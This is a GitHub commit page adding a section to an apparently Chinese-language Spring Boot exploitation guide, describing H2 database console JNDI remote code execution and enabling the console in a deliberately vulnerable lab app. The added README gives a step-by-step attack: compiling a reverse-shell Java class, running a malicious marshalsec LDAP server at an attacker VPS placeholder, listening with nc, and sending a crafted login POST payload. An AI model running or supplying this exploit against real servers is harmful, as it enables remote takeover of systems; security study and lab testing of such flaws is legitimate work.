Commit b1e14d1

committed

add h2 database conosle jndi rce

1 parent e4d67bf commit b1e14d1Copy full SHA for b1e14d1

File tree

2 files changed

+105

-6

lines changed

README.md
repository/springboot-h2-database-rce/src/main/resources
- application.properties

2 files changed

+105

-6

lines changed

`‎README.md`

Lines changed: 101 additions & 6 deletions

Original file line number	Diff line number	Diff line change
`@@ -102,18 +102,28 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安`
`102`	`102`	`* [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-5)`
`103`	`103`	`* [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-5)`
`104`	`104`	`* [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-5)`
`105`		`- * [0x07:mysql jdbc deserialization RCE](#0x07mysql-jdbc-deserialization-rce)`
	`105`	`+ * [0x07:h2 database console JNDI RCE](#0x07h2-database-console-jndi-rce)`
`106`	`106`	`* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-9)`
`107`	`107`	`* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-9)`
	`108`	`+ * [步骤一:访问路由获得 jsessionid](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E8%AE%BF%E9%97%AE%E8%B7%AF%E7%94%B1%E8%8E%B7%E5%BE%97-jsessionid)`
	`109`	`+ * [步骤二:准备要执行的 Java 代码](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E5%87%86%E5%A4%87%E8%A6%81%E6%89%A7%E8%A1%8C%E7%9A%84-java-%E4%BB%A3%E7%A0%81-1)`
	`110`	`+ * [步骤三:架设恶意 ldap 服务](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E6%9E%B6%E8%AE%BE%E6%81%B6%E6%84%8F-ldap-%E6%9C%8D%E5%8A%A1)`
	`111`	`+ * [步骤四:监听反弹 shell 的端口](#%E6%AD%A5%E9%AA%A4%E5%9B%9B%E7%9B%91%E5%90%AC%E5%8F%8D%E5%BC%B9-shell-%E7%9A%84%E7%AB%AF%E5%8F%A3-1)`
	`112`	`+ * [步骤五:发包触发 JNDI 注入](#%E6%AD%A5%E9%AA%A4%E4%BA%94%E5%8F%91%E5%8C%85%E8%A7%A6%E5%8F%91-jndi-%E6%B3%A8%E5%85%A5)`
	`113`	`+ * [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-6)`
	`114`	`+ * [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-6)`
	`115`	`+ * [0x08:mysql jdbc deserialization RCE](#0x08mysql-jdbc-deserialization-rce)`
	`116`	`+ * [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-10)`
	`117`	`+ * [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-10)`
`108`	`118`	`* [步骤一:查看环境依赖](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%9F%A5%E7%9C%8B%E7%8E%AF%E5%A2%83%E4%BE%9D%E8%B5%96)`
`109`	`119`	`* [步骤二:架设恶意 rogue mysql server](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E6%9E%B6%E8%AE%BE%E6%81%B6%E6%84%8F-rogue-mysql-server)`
`110`	`120`	`* [步骤三:设置 spring\.datasource\.url 属性](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E8%AE%BE%E7%BD%AE-springdatasourceurl-%E5%B1%9E%E6%80%A7)`
`111`	`121`	`* [步骤四:刷新配置](#%E6%AD%A5%E9%AA%A4%E5%9B%9B%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE-1)`
`112`	`122`	`* [步骤五:触发数据库查询](#%E6%AD%A5%E9%AA%A4%E4%BA%94%E8%A7%A6%E5%8F%91%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9F%A5%E8%AF%A2)`
`113`	`123`	`* [步骤六:恢复正常 jdbc url](#%E6%AD%A5%E9%AA%A4%E5%85%AD%E6%81%A2%E5%A4%8D%E6%AD%A3%E5%B8%B8-jdbc-url)`
`114`	`124`	`* [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-6)`
`115`		`- * [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-6)`
`116`		`- * [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-6)`
	`125`	`+ * [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-7)`
	`126`	`+ * [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-7)`
`117`	`127`
`118`	`128`
`119`	`129`
`@@ -863,7 +873,7 @@ http://127.0.0.1:9093/env`
`863`	`873`	- 目标使用了 `jolokia-core` 依赖(版本要求暂未知)并且环境中存在相关 MBean
`864`	`874`	`- 目标可以请求攻击者的 HTTP 服务器(请求可出外网)`
`865`	`875`
`866`		`-- ldap 注入可能会受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1`
	`876`	`+- JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP 方式)`
`867`	`877`
`868`	`878`
`869`	`879`
`@@ -979,7 +989,7 @@ http://127.0.0.1:9094/env`
`979`	`989`	- 目标网站存在 `/jolokia` 或 `/actuator/jolokia` 接口
`980`	`990`	- 目标使用了 `jolokia-core` 依赖(版本要求暂未知)并且环境中存在相关 MBean
`981`	`991`	`- 目标可以请求攻击者的服务器(请求可出外网)`
`982`		`-- 实际测试 RMI 注入受目标 JDK 版本影响,jdk < 6u141/7u131/8u121`
	`992`	`+- JNDI 注入受目标 JDK 版本影响,jdk < 6u141/7u131/8u121(RMI 方式)`
`983`	`993`
`984`	`994`
`985`	`995`
`@@ -1136,7 +1146,92 @@ http://127.0.0.1:9096/actuator/env`
`1136`	`1146`
`1137`	`1147`
`1138`	`1148`
`1139`		`-### 0x07:mysql jdbc deserialization RCE`
	`1149`	`+### 0x07:h2 database console JNDI RCE`
	`1150`	`+`
	`1151`	`+#### 利用条件:`
	`1152`	`+`
	`1153`	+- 存在 `com.h2database.h2` 依赖(版本要求暂未知)
	`1154`	+- spring 配置中启用 h2 console `spring.h2.console.enabled=true`
	`1155`	`+- JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP 方式)`
	`1156`	`+`
	`1157`	`+`
	`1158`	`+`
	`1159`	`+#### 利用方法:`
	`1160`	`+`
	`1161`	`+##### 步骤一:访问路由获得 jsessionid`
	`1162`	`+`
	`1163`	+直接访问目标开启 h2 console 的默认路由 `/h2-console`,目标会跳转到页面 `/h2-console/login.jsp?jsessionid=xxxxxx`,记录下实际的 `jsessionid=xxxxxx` 值。
	`1164`	`+`
	`1165`	`+`
	`1166`	`+`
	`1167`	`+##### 步骤二:准备要执行的 Java 代码`
	`1168`	`+`
	`1169`	+编写优化过后的用来反弹 shell 的 [Java 示例代码](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/JNDIObject.java) `JNDIObject.java`,
	`1170`	`+`
	`1171`	`+使用兼容低版本 jdk 的方式编译:`
	`1172`	`+`
	`1173`	+```bash
	`1174`	`+javac -source 1.5 -target 1.5 JNDIObject.java`
	`1175`	+```
	`1176`	`+`
	`1177`	+然后将生成的 `JNDIObject.class` 文件拷贝到步骤二中的网站根目录。
	`1178`	`+`
	`1179`	`+`
	`1180`	`+`
	`1181`	`+##### 步骤三:架设恶意 ldap 服务`
	`1182`	`+`
	`1183`	`+下载 [marshalsec](https://github.com/mbechler/marshalsec) ,使用下面命令架设对应的 ldap 服务:`
	`1184`	`+`
	`1185`	+```bash
	`1186`	`+java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:80/#JNDIObject 1389`
	`1187`	+```
	`1188`	`+`
	`1189`	`+`
	`1190`	`+`
	`1191`	`+##### 步骤四:监听反弹 shell 的端口`
	`1192`	`+`
	`1193`	`+一般使用 nc 监听端口,等待反弹 shell`
	`1194`	`+`
	`1195`	+```bash
	`1196`	`+nc -lv 443`
	`1197`	+```
	`1198`	`+`
	`1199`	`+`
	`1200`	`+`
	`1201`	`+##### 步骤五:发包触发 JNDI 注入`
	`1202`	`+`
	`1203`	+根据实际情况,替换下面数据中的 `jsessionid=xxxxxx`、`www.example.com` 和 `ldap://your-vps-ip:1389/JNDIObject`
	`1204`	`+`
	`1205`	+```bash
	`1206`	`+POST /h2-console/login.do?jsessionid=xxxxxx`
	`1207`	`+Host: www.example.com`
	`1208`	`+Content-Type: application/x-www-form-urlencoded`
	`1209`	`+Referer: http://www.example.com/h2-console/login.jsp?jsessionid=xxxxxx`
	`1210`	`+`
	`1211`	`+language=en&setting=Generic+H2+%28Embedded%29&name=Generic+H2+%28Embedded%29&driver=javax.naming.InitialContext&url=ldap://your-vps-ip:1389/JNDIObject&user=&password=`
	`1212`	+```
	`1213`	`+`
	`1214`	`+`
	`1215`	`+`
	`1216`	`+#### 漏洞分析:`
	`1217`	`+`
	`1218`	`+ [Spring Boot + H2数据库JNDI注入](https://mp.weixin.qq.com/s/Yn5U8WHGJZbTJsxwUU3UiQ)`
	`1219`	`+`
	`1220`	`+`
	`1221`	`+`
	`1222`	`+#### 漏洞环境:`
	`1223`	`+`
	`1224`	`+[repository/springboot-h2-database-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-h2-database-rce)`
	`1225`	`+`
	`1226`	`+正常访问:`
	`1227`	`+`
	`1228`	+```
	`1229`	`+http://127.0.0.1:9096/h2-console`
	`1230`	+```
	`1231`	`+`
	`1232`	`+`
	`1233`	`+`
	`1234`	`+### 0x08:mysql jdbc deserialization RCE`
`1140`	`1235`
`1141`	`1236`	`#### 利用条件:`
`1142`	`1237`

`‎repository/springboot-h2-database-rce/src/main/resources/application.properties`

Lines changed: 4 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -5,6 +5,10 @@ server.address=127.0.0.1`
`5`	`5`	`spring.jpa.database = MYSQL`
`6`	`6`	`spring.jpa.database-platform=org.hibernate.dialect.MySQL5Dialect`
`7`	`7`
	`8`	`+# enable h2 console jndi rce`
	`9`	`+#spring.h2.console.path=/h2-console`
	`10`	`+spring.h2.console.enabled=true`
	`11`	`+`
`8`	`12`	`# vulnerable configuration set 0: spring boot 1.0 - 1.4`
`9`	`13`	`# all spring boot versions 1.0 - 1.4 expose actuators by default without any parameters`
`10`	`14`	`# no configuration required to expose them`

0 commit comments

Comments

(0)

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Commit b1e14d1

File tree

2 files changed

2 files changed

`‎README.md`

`‎repository/springboot-h2-database-rce/src/main/resources/application.properties`

0 commit comments